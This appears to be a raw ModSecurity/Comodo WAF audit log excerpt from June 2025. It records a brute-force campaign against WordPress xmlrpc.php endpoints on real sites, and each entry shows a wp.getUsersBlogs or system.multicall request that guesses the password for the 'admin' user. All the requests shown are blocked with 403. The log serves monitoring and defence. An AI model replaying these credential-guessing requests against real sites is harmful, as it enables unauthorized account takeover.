Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --abdaf072-C-- system.multicallmethodNamewp.getUsersBlogsparamsorlinOrlin --abdaf072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdaf072-E-- --abdaf072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113714907653 5994 (- - -) Stopwatch2: 1749113714907653 5994; combined=4254, p1=555, p2=3535, p3=0, p4=0, p5=99, sr=94, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdaf072-Z-- --bb6ea129-A-- [05/Jun/2025:15:55:23 +0700] aEFbeyrHpfaS2Cuwh8XuVwAAAFI 103.236.140.4 46170 103.236.140.4 8181 --bb6ea129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --bb6ea129-C-- wp.getUsersBlogs admin changeme! --bb6ea129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb6ea129-E-- --bb6ea129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113723276060 5605 (- - -) Stopwatch2: 1749113723276060 5605; combined=4212, p1=470, p2=3365, p3=0, p4=0, p5=203, sr=93, sw=174, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb6ea129-Z-- --9e63de1a-A-- [05/Jun/2025:15:56:26 +0700] aEFbuirHpfaS2Cuwh8XvTQAAAFM 103.236.140.4 49362 103.236.140.4 8181 --9e63de1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9e63de1a-C-- wp.getUsersBlogs admin smkn22-jktschid --9e63de1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e63de1a-E-- --9e63de1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113786660669 5191 (- - -) Stopwatch2: 1749113786660669 5191; combined=3718, p1=450, p2=3100, p3=0, p4=0, p5=99, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e63de1a-Z-- --37124b67-A-- [05/Jun/2025:15:57:26 +0700] aEFb9n-K7ToMdu-YSII94QAAABQ 103.236.140.4 52472 103.236.140.4 8181 --37124b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --37124b67-C-- wp.getUsersBlogs admin smkn22-jkt_sch_id --37124b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37124b67-E-- --37124b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113846356741 5463 (- - -) Stopwatch2: 1749113846356741 5463; combined=3906, p1=462, p2=3240, p3=0, p4=0, p5=117, sr=88, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37124b67-Z-- --62bc4239-A-- [05/Jun/2025:15:58:26 +0700] aEFcMirHpfaS2Cuwh8Xw6wAAAFE 103.236.140.4 55684 103.236.140.4 8181 --62bc4239-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --62bc4239-C-- wp.getUsersBlogs admin root123 --62bc4239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62bc4239-E-- --62bc4239-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113906835442 5515 (- - -) Stopwatch2: 1749113906835442 5515; combined=4242, p1=502, p2=3535, p3=0, p4=0, p5=122, sr=92, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62bc4239-Z-- --4b34680e-A-- [05/Jun/2025:15:59:26 +0700] aEFcbn-K7ToMdu-YSII_qQAAAAQ 103.236.140.4 58794 103.236.140.4 8181 --4b34680e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4b34680e-C-- wp.getUsersBlogs admin manager123 --4b34680e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b34680e-E-- --4b34680e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113966552248 4842 (- - -) Stopwatch2: 1749113966552248 4842; combined=3782, p1=432, p2=3170, p3=0, p4=0, p5=105, sr=91, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b34680e-Z-- --afc6d427-A-- [05/Jun/2025:16:00:28 +0700] aEFcrFwdJdhOudw5hdznxAAAAJQ 103.236.140.4 33720 103.236.140.4 8181 --afc6d427-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --afc6d427-C-- wp.getUsersBlogs admin Login --afc6d427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc6d427-E-- --afc6d427-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114028629237 5143 (- - -) Stopwatch2: 1749114028629237 5143; combined=3643, p1=446, p2=3023, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc6d427-Z-- --d04f0f51-A-- [05/Jun/2025:16:01:31 +0700] aEFc61wdJdhOudw5hdzotQAAAIQ 103.236.140.4 36904 103.236.140.4 8181 --d04f0f51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d04f0f51-C-- wp.getUsersBlogs admin letitbe --d04f0f51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d04f0f51-E-- --d04f0f51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114091144530 5320 (- - -) Stopwatch2: 1749114091144530 5320; combined=3874, p1=476, p2=3222, p3=0, p4=0, p5=103, sr=90, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d04f0f51-Z-- --0d921168-A-- [05/Jun/2025:16:02:31 +0700] aEFdJ3-K7ToMdu-YSIJBmAAAAAc 103.236.140.4 40004 103.236.140.4 8181 --0d921168-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0d921168-C-- wp.getUsersBlogs admin 111qqq!!! --0d921168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d921168-E-- --0d921168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114151568509 3604 (- - -) Stopwatch2: 1749114151568509 3604; combined=2553, p1=324, p2=2109, p3=0, p4=0, p5=71, sr=66, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d921168-Z-- --59adaa01-A-- [05/Jun/2025:16:02:45 +0700] aEFdNX-K7ToMdu-YSIJBpAAAAAI 103.236.140.4 40810 103.236.140.4 8181 --59adaa01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --59adaa01-C-- wp.getUsersBlogs admin 1234%^&* --59adaa01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59adaa01-E-- --59adaa01-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114165828522 3579 (- - -) Stopwatch2: 1749114165828522 3579; combined=2763, p1=323, p2=2310, p3=0, p4=0, p5=79, sr=58, sw=51, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59adaa01-Z-- --e90dbd32-A-- [05/Jun/2025:16:03:36 +0700] aEFdaH-K7ToMdu-YSIJCJgAAAAY 103.236.140.4 43406 103.236.140.4 8181 --e90dbd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e90dbd32-C-- wp.getUsersBlogs admin 212903 --e90dbd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e90dbd32-E-- --e90dbd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114216977690 4802 (- - -) Stopwatch2: 1749114216977690 4802; combined=3498, p1=449, p2=2877, p3=0, p4=0, p5=100, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e90dbd32-Z-- --63bf994f-A-- [05/Jun/2025:16:04:37 +0700] aEFdpX-K7ToMdu-YSIJCuQAAABE 103.236.140.4 46456 103.236.140.4 8181 --63bf994f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --63bf994f-C-- wp.getUsersBlogs admin taylor --63bf994f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63bf994f-E-- --63bf994f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114277013202 5346 (- - -) Stopwatch2: 1749114277013202 5346; combined=3978, p1=510, p2=3267, p3=0, p4=0, p5=117, sr=92, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63bf994f-Z-- --d533050b-A-- [05/Jun/2025:16:05:46 +0700] aEFd6uth7G2xELALzPZE5wAAAMc 103.236.140.4 50018 103.236.140.4 8181 --d533050b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d533050b-C-- wp.getUsersBlogs admin iloveyou1 --d533050b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d533050b-E-- --d533050b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114346081565 5442 (- - -) Stopwatch2: 1749114346081565 5442; combined=4052, p1=468, p2=3396, p3=0, p4=0, p5=109, sr=97, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d533050b-Z-- --b359822d-A-- [05/Jun/2025:16:06:46 +0700] aEFeJuth7G2xELALzPZF3QAAAM8 103.236.140.4 53050 103.236.140.4 8181 --b359822d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b359822d-C-- wp.getUsersBlogs admin rachel --b359822d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b359822d-E-- --b359822d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114406644006 5013 (- - -) Stopwatch2: 1749114406644006 5013; combined=3627, p1=455, p2=2991, p3=0, p4=0, p5=107, sr=106, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b359822d-Z-- --341d2731-A-- [05/Jun/2025:16:07:02 +0700] aEFeNuth7G2xELALzPZF9wAAANg 103.236.140.4 53900 103.236.140.4 8181 --341d2731-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.165.236.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.165.236.42 X-Forwarded-Proto: https Connection: close Content-Length: 475 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --341d2731-C-- system.multicallmethodNamewp.getUsersBlogsparamsroot123 --341d2731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --341d2731-E-- --341d2731-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.165.236.42 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114422443763 4497 (- - -) Stopwatch2: 1749114422443763 4497; combined=3203, p1=393, p2=2661, p3=0, p4=0, p5=94, sr=76, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --341d2731-Z-- --286e3229-A-- [05/Jun/2025:16:07:18 +0700] aEFeRlwdJdhOudw5hdztTwAAAIk 103.236.140.4 54722 103.236.140.4 8181 --286e3229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --286e3229-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123% --286e3229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --286e3229-E-- --286e3229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114438479369 4744 (- - -) Stopwatch2: 1749114438479369 4744; combined=3482, p1=407, p2=2931, p3=0, p4=0, p5=86, sr=79, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286e3229-Z-- --cbdc8611-A-- [05/Jun/2025:16:07:52 +0700] aEFeaH-K7ToMdu-YSIJE7AAAAAM 103.236.140.4 56472 